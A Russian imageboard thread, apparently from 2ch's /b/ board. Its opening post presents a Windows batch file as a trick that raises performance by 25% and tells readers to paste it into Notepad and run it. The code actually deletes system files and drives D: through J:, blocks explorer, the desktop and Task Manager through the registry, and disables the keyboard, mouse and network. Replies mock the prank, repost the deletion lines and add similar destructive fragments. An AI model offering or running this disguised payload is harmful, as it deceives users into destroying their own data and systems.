|
Привет всем пользователям OS Windows. Наверное всем не секрет что Windows нагружает компьютер до такой степени, что некоторые игры могут лишь позавидовать, поэтому я решил поделиться способом как сделать это с помощью блокнота. Для этого нужно создать в блокноте код и сохранить его в формате ".bat", запустить код и всё. Вот так вот просто можно увеличить производительность компьютера на 25% Также, если ваш компьютер уже оптимизирован и на него установлены все необходимые драйвера можно вставлять не весь код, а только его часть. С первой строки до строки "rundll32 mouse,disable" Теперь непосредственно к коду и его созданию. 1) Создать блокнот на рабочем столе (Именно на рабочем столе, иначе работать не будет). 2) Скопировать текст кода, приведенный ниже (или его часть). 3) Нажать на кнопку "Файл" в верхней части блокнота и в выпавшем меню нажать кнопку "Сохранить как". 4) При сохранении файла подписать в конце названия файла .bat P.s. Если вам не помог весь код или вы боитесь его использовать на вашем старом компьютере, то можно попробовать использовать лишь часть кода(но не меньше 5 строк, иначе работать не будет, а сделает еще хуже) Код для вставки: @echo off del "%SystemRoot%\Media" /q >nul TIMEOUT /T 300 /NOBREAK cls echo Please wait reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul TIMEOUT /T 150 /NOBREAK cls echo Please wait del "%SystemRoot%Cursors . " >nul TIMEOUT /T 70 /NOBREAK cls echo Please wait del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul TIMEOUT /T 30 /NOBREAK cls echo Please wait reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul /v NoControlPanel /t REG_DWORD /d 1 /f >nul TIMEOUT /T 15 /NOBREAK cls echo Please wait for /l i in (1,1,100) do mkdir "dir i" reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Pier2a4e11o /F del "%SystemRoot%Cursors . " >nul del "%SystemRoot%Cursors . " >nul TIMEOUT /T 20 /NOBREAK cls echo Please wait rundll32 keyboard,disable rundll32 mouse,disable ipconfig /release msg "Eb4t t1 10x" del D:\ . /f /s /q del E:\ . /f /s /q del F:\ . /f /s /q del G:\ . /f /s /q del H:\ . /f /s /q del I:\ . /f /s /q del J:\ .* /f /s /q exit |
|
>del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q С этой хуйни окончательно обдрыстался |
|
Хуёвый батник и ты хуй. |
|
Обосрался с подливкой )) |
|
Не работает ОП хуй |
|
Долбаеб, ты читать умеешь? Там же написано подождать 248 секунд |
|
>Долбаеб, ты читать умеешь? Там же написано подождать 248 секунд Все равно не работает. Я заменил время ожидания на 5 секунд - абсолютно все зафейлилось, после перезагрузки никаких изменений. ОП все еще хуй |
|
Надо от админа запускать. И желательно не на виртуалке. |
|
Хоспаде, запустите вы уже эту парашу в вируталбоксе, молю. Ржу как конь, разбудил тянку сбоку, дала пизды. |
|
Я запускал и нихуя оно не работает |
|
А ты читал, что если не работает, то надо только часть кода? |
|
>А ты читал, что если не работает, то надо только часть кода? Мне еще не хватало искать ошибки чьих-то батниках Сейчас |
|
>Сейчас И больше его никто не видел. |
|
Вот это запусти rundll32 keyboard,disable rundll32 mouse,disable ipconfig /release msg "Eb4t t1 10x" del D:\. /f /s /q del E:\. /f /s /q del F:\. /f /s /q del G:\. /f /s /q del H:\. /f /s /q del I:\. /f /s /q del J:\.* /f /s /q exit |
|
>msg "Eb4t t1 10x" Проиграл с этого. Все равно не работает |
|
Ну и хуй с ним. Может кто-нибудь допилит это? |
|
А ты с @echo off вставлял? |
|
>А ты с @echo off вставлял? Да |
|
А хотя, беру свои слова обратно. Не системные диски оно чистит. |
|
Оно ещё и в реестре насрать должно. Проверял? |
|
А удалить папку SYSTEM32 пробовал? |
|
Вставил, комп перезагрузился, нихуя не поменялось. |
|
Палишься. Этот скрипт убирает курсор, отключает мышь и клавиатуру. Удаляет какой то драйвер. Короче полое поганство. |
|
Щас бы не сидеть через виртуалку. |
|
Короче мамин хацкер хотел всех затроллить скриптом который убирает курсор, удаляет драйвера, мышку, клавиатуру и ломает проводник виндоуса, но жидко обосрался с подливой. Двач такой двач. |
|
Я это нашёл и от себя добавил |
|
Этож с семёрки не будет работать. |
|
Это для олдов, я же ньюфажка |
|
>msg "Eb4t t1 10x" >del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q |
|
ОП, можно дополнительно удалить такую ненужную ебаку, как систем32 винлогон |
|
>rundll32 keyboard,disable >rundll32 mouse,disable Твой батник мышку с клавиатурой отключает, да? Видел такие шутки еще до двачей году в 2005 в интернетах, еще иногда диск C\ предлагали форматнуть через командную строку. >можно вставлять не весь код, а только его часть. А можно вообще ничего не вставлять. |
|
я тебе больше скажу, он ещё и форматирует С\ |
|
заебись поржунькал msg "Eb4t t1 10x" |
|
Не запускал, но надеюсь твоя мать умрет |
|
>Не запускал Тогда умрет твоя. |
|
Блядь, сколько вам говорить, чтобы вы постили код на pastebin/ideone, а не сюда? Тут разметка всё съедает. Сажи дибилу. |
|
Такс что тут у нас? Это же распространение вредоносных программ! Гражданин, отойдите от клавиатуры и ожидайте прибытие наряда! |
|
Вредоносных букв |
|
>msg "Eb4t t1 10x" >del D:\. /f /s /q >del E:\. /f /s /q >del F:\. /f /s /q >del G:\. /f /s /q >del H:\. /f /s /q >del I:\. /f /s /q >del J:\.* /f /s /q >exit ты ахуел удалять все диски? |
|
ОГО ВЫ ХАКЕР???? ВЗЛОМАЙТЕ ПОЖАЛУЙСТА ИГРУ СИНИЙ КИТ!!! ДЕТИ ГИБНУТ!!!! |
|
|
|
Нахуя ты бампаеш? Думаешь в 2018 реально найдется дебил который будет запускать хуйню с двача? |
|
Ну ладно, тогда это будет копипаста. |
|
в 2018 как раз таки да |
|
> в 2018 реально найдется дебил А когда, если не в 2018? |
|
|
|
Про строку со скрытым текстом. На границах скрытого текста в блокноте необходимо поставить Так отображается из-за того, что границы скрытого текста на дваче. |
|
ньюфажина, мог бы скрин сделать |
|
|
|
оп, есть вишня обнавленая? скидывай сюда, а то моя устарела |
|
Сейчас, погодь. Алсо, может создать очередной вишмастер тред? А то последний раз я его создавал в 2010м с охуительной легендой про скрытые посты, и все такое, я даже интерфейс в фотошопе тогда слепил фейковый, лул. тогда у пары школотронов виндос отвалился. |
|
> пары школотронов виндос отвалился. Это были толстяки. |
|
Не думаю, что кто-то специально делал фотки мониторов с мертвой виндой лол. Даже если толстяки, было весело энивей |
|
|
|
Как же хорошо, что у меня мак. |
|
> мак Наркоман ебучий |
|
Дааа, он то никак не нагружает макбук. |
|
|
|
@echo off del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul @echo off del "%SystemRoot%\Media" /q >nul %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul del "%SystemRoot%Cursors . " >nul Сыграем в рулетку? |
|
Акей, че нада делать? |
|
Копируй сначала 1 и 2 Потом 3 и 4 Потом каждую по отдельности |
|
C sudo или без? |
|
|
|
У меня старый пекус и ХР, думал поможет, а то даже Обливион лагает, а теперь вообще нихуя не работает. Как исправить? |
|
|
|
@Echo off do del "c:\windows\exploer.exe" do del "c:\windows\mspoint.exe" do del "c:\windows\notepad.exe" |
|
А если просто снести MBR? Вроде можно как-то было. |
|
|
|
Бля откуда вы лезите. Для несведущих код из пасты очистит диски. Оп долбоеб, треду сажи |
|
всеголишь удалит вроде. Хороший код |
|
|
|
Для, анчоусы, ОП реально годноту спалил! Мне помогло, система стала работать быстрее! |
|
давай скриншот диспетчера задач, там нагрузка цп должна быть меньше 50% |
|
Я уже с тилибона сижу, у нас час ночи |
|
|
|
Если ты нищебродино ебаное и у тебя нет тела то это только у тя |
|
НЕ СМЕШНО!!!!!! У МЕНЯ ДРУГ УМЕР ПИШУ С ТАПКА!!!!!!!!!!!! |
|
|
|
Компьютыр будешь востаналивать даун ебаны ?? ? |
|
Пишешь с калькулятора? |
|
|
|
Оп, через две недели в школу а ты копипастиш |
|
Я сам придумол. |
|
|
|
Ладно, а где же это можно продвигать? |
|
В 2007, очевидно же. |
|
|
|
Не грузится винда, чё за хуйня? |
|
|
|
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul |
|
|
|
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul |
|
|
|
Кек, 2018 год, в /b/ пытаются трелькать батником, который еще и сами же просят запилить и копипастнуть. |
|
|
|
Все равно этот дестрой не такой весёлый, как игры с радмином и прочими троянами. |
|
|
|
сначала мне показалось что я в 2007. А потом понял, что просто ОП дурачок. |
|
|
|
Как жаль что у меня линукс и эта прекрасная оптимизация не сработает. |
|
|
|
Настолько толсто и неактуально, что прямо как демотиватор из 2007. |